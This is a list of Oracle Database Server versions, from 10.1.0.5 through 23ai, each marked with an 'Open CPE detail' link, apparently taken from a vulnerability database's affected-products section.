- Oracle>>Database_server >> Version 10.1.0.5 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.5 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.0 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.1 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.1 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.2 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.2 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.3 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.3 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.4 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.4.2 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.0.5 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.1 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.2 (Open CPE detail)
- Oracle>>Database_server >> Version 10.2.3 (Open CPE detail)
- Oracle>>Database_server >> Version 11 (Open CPE detail)
- Oracle>>Database_server >> Version 11.1.0.6 (Open CPE detail)
- Oracle>>Database_server >> Version 11.1.0.6.0 (Open CPE detail)
- Oracle>>Database_server >> Version 11.1.0.6.0 (Open CPE detail)
- Oracle>>Database_server >> Version 11.1.0.7 (Open CPE detail)
- Oracle>>Database_server >> Version 11.1.0.7.0 (Open CPE detail)
- Oracle>>Database_server >> Version 11.1.0.7.0 (Open CPE detail)
- Oracle>>Database_server >> Version 11.2.0.1 (Open CPE detail)
- Oracle>>Database_server >> Version 11.2.0.1.0 (Open CPE detail)
- Oracle>>Database_server >> Version 11.2.0.1.0 (Open CPE detail)
- Oracle>>Database_server >> Version 11.2.0.2 (Open CPE detail)
- Oracle>>Database_server >> Version 11.2.0.3 (Open CPE detail)
- Oracle>>Database_server >> Version 11.2.0.4 (Open CPE detail)
- Oracle>>Database_server >> Version 11g (Open CPE detail)
- Oracle>>Database_server >> Version 12.1.0.1 (Open CPE detail)
- Oracle>>Database_server >> Version 12.1.0.2 (Open CPE detail)
- Oracle>>Database_server >> Version 12.2.0.1 (Open CPE detail)
- Oracle>>Database_server >> Version 12c (Open CPE detail)
- Oracle>>Database_server >> Version 18 (Open CPE detail)
- Oracle>>Database_server >> Version 18.1 (Open CPE detail)
- Oracle>>Database_server >> Version 18.1.0.0 (Open CPE detail)
- Oracle>>Database_server >> Version 18.2 (Open CPE detail)
- Oracle>>Database_server >> Version 18c (Open CPE detail)
- Oracle>>Database_server >> Version 19.1 (Open CPE detail)
- Oracle>>Database_server >> Version 19.3 (Open CPE detail)
- Oracle>>Database_server >> Version 19.3 (Open CPE detail)
- Oracle>>Database_server >> Version 19.4 (Open CPE detail)
- Oracle>>Database_server >> Version 19.5 (Open CPE detail)
- Oracle>>Database_server >> Version 19.6 (Open CPE detail)
- Oracle>>Database_server >> Version 19.7 (Open CPE detail)
- Oracle>>Database_server >> Version 19.8 (Open CPE detail)
- Oracle>>Database_server >> Version 19.9 (Open CPE detail)
- Oracle>>Database_server >> Version 19.10 (Open CPE detail)
- Oracle>>Database_server >> Version 19.11 (Open CPE detail)
- Oracle>>Database_server >> Version 19.12 (Open CPE detail)
- Oracle>>Database_server >> Version 19.13 (Open CPE detail)
- Oracle>>Database_server >> Version 19.14 (Open CPE detail)
- Oracle>>Database_server >> Version 19.15 (Open CPE detail)
- Oracle>>Database_server >> Version 19.16 (Open CPE detail)
- Oracle>>Database_server >> Version 19.17 (Open CPE detail)
- Oracle>>Database_server >> Version 19.18 (Open CPE detail)
- Oracle>>Database_server >> Version 19.19 (Open CPE detail)
- Oracle>>Database_server >> Version 19.20 (Open CPE detail)
- Oracle>>Database_server >> Version 19.20 (Open CPE detail)
- Oracle>>Database_server >> Version 19.21 (Open CPE detail)
- Oracle>>Database_server >> Version 19.22 (Open CPE detail)
- Oracle>>Database_server >> Version 19.23 (Open CPE detail)
- Oracle>>Database_server >> Version 19c (Open CPE detail)
- Oracle>>Database_server >> Version 21.3 (Open CPE detail)
- Oracle>>Database_server >> Version 21.3 (Open CPE detail)
- Oracle>>Database_server >> Version 21.11 (Open CPE detail)
- Oracle>>Database_server >> Version 21.12 (Open CPE detail)
- Oracle>>Database_server >> Version 21.13 (Open CPE detail)
- Oracle>>Database_server >> Version 21c (Open CPE detail)
- Oracle>>Database_server >> Version 23ai (Open CPE detail)
